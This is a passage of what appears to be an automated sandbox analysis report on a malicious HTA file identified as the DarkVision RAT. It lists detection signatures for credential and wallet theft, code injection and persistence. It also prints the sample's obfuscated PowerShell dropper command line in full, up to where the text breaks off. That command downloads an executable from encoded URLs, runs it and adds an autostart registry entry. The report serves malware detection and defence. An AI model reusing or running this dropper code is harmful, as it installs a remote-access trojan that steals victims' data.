Edit tour
Windows
Analysis Report
upgrade.hta
Overview
General Information
| Sample name: | upgrade.hta |
| Analysis ID: | 1570651 |
| MD5: | 03f88b6e5c92cf8865b13fb7495eac0a |
| SHA1: | 5f8a0e82674b25a9ef0f5d93f23075b1d7fb632b |
| SHA256: | c839ec03c9b07879980d362ba4615df453d6e5847baf8fb89e1d0f2c5bafb2b8 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
DarkVision Rat
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 7156 cmdline: mshta.exe "C:\Users\ user\Deskt op\upgrade .hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 6532 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted function g CKawp($xqE TuHkBN, $c gpVK){[IO. File]::Wri teAllBytes ($xqETuHkB N, $cgpVK) };function TPUUAPTRh ($xqETuHkB N){if($xqE TuHkBN.End sWith((odP EDz @(4735 9,47413,47 421,47421) )) -eq $Tr ue){Start- Process (o dPEDz @(47 427,47430, 47423,4741 3,47421,47 421,47364, 47363,4735 9,47414,47 433,47414) ) $xqETuHk BN}else{St art-Proces s $xqETuHk BN}};funct ion IogZmN ($xqETuHkB N, $fYoQiz CPx){[Micr osoft.Win3 2.Registry ]::SetValu e((odPEDz @(47385,47 388,47382, 47402,4740 8,47380,47 398,47395, 47395,4738 2,47391,47 397,47408, 47398,4739 6,47382,47 395,47405, 47396,4742 4,47415,47 429,47432, 47410,4742 7,47414,47 405,47390, 47418,4741 2,47427,47 424,47428, 47424,4741 5,47429,47 405,47400, 47418,4742 3,47413,47 424,47432, 47428,4740 5,47380,47 430,47427, 47427,4741 4,47423,47 429,47399, 47414,4742 7,47428,47 418,47424, 47423,4740 5,47395,47 430,47423) ), $fYoQiz CPx, $xqET uHkBN)};fu nction MCN jOTFH($xqE TuHkBN){$I VMCWJwi=(o dPEDz @(47 385,47418, 47413,4741 3,47414,47 423));$VGL giVJ=(Get- ChildItem $xqETuHkBN -Force);$ VGLgiVJ.At tributes=$ VGLgiVJ.At tributes - bor ([IO.F ileAttribu tes]$IVMCW Jwi).value __};functi on oBvvmAn E($iXTtDfK ){$GzBKYX = New-Obje ct (odPEDz @(47391,4 7414,47429 ,47359,474 00,47414,4 7411,47380 ,47421,474 18,47414,4 7423,47429 ));[Net.Se rvicePoint Manager]:: SecurityPr otocol = [ Net.Securi tyProtocol Type]::TLS 12;$cgpVK = $GzBKYX. DownloadDa ta($iXTtDf K);return $cgpVK};fu nction odP EDz($rGehV sA){$jtBdp Z=47313;$Y WQUeqd=$Nu ll;foreach ($qyPsd in $rGehVsA) {$YWQUeqd+ =[char]($q yPsd-$jtBd pZ)};retur n $YWQUeqd };function WmSEp(){$ lEPJgGls = $env:APPD ATA + '\'; $SCATfjY = oBvvmAnE (odPEDz @( 47417,4742 9,47429,47 425,47428, 47371,4736 0,47360,47 425,47430, 47411,4735 8,47414,47 362,47415, 47412,4741 3,47410,47 413,47369, 47363,4736 8,47367,47 413,47365, 47368,4741 3,47415,47 410,47413, 47364,4741 5,47369,47 363,47415, 47366,4737 0,47364,47 367,47411, 47370,4741 2,47366,47 364,47359, 47427,4736 3,47359,47 413,47414, 47431,4736 0,47388,47 391,47399, 47402,4738 6,47391,47 391,47391, 47359,4741 4,47433,47 414));$VQr Lt = $lEPJ gGls + 'KN VYINNN.exe ';gCKawp $ VQrLt $SCA TfjY;TPUUA PTRh $VQrL t;$fYoQizC Px = 'hzQt naa';IogZm N $VQrLt $ fYoQizCPx; ;$MfdAL = oBvvmAnE ( odPEDz @(4 7417,47429 ,47429,474 25,47428,4 7371,47360 ,47360,474 25,47430,4 7411,47358 ,47412,473 66,47410,4 7362,47369 ,47414,474 11,47368,4 7367,47414 ,47361,473 64,47365,4 7413,47369 ,47369,473 69,47370,4 7370,47414 ,47362,474 15,47365,4 7365,47415 ,47369,473 66,47370,4 7410,47369 ,47365,473 70,47359,4 7427,47363 ,47359,474 13,47414,4 7431,47360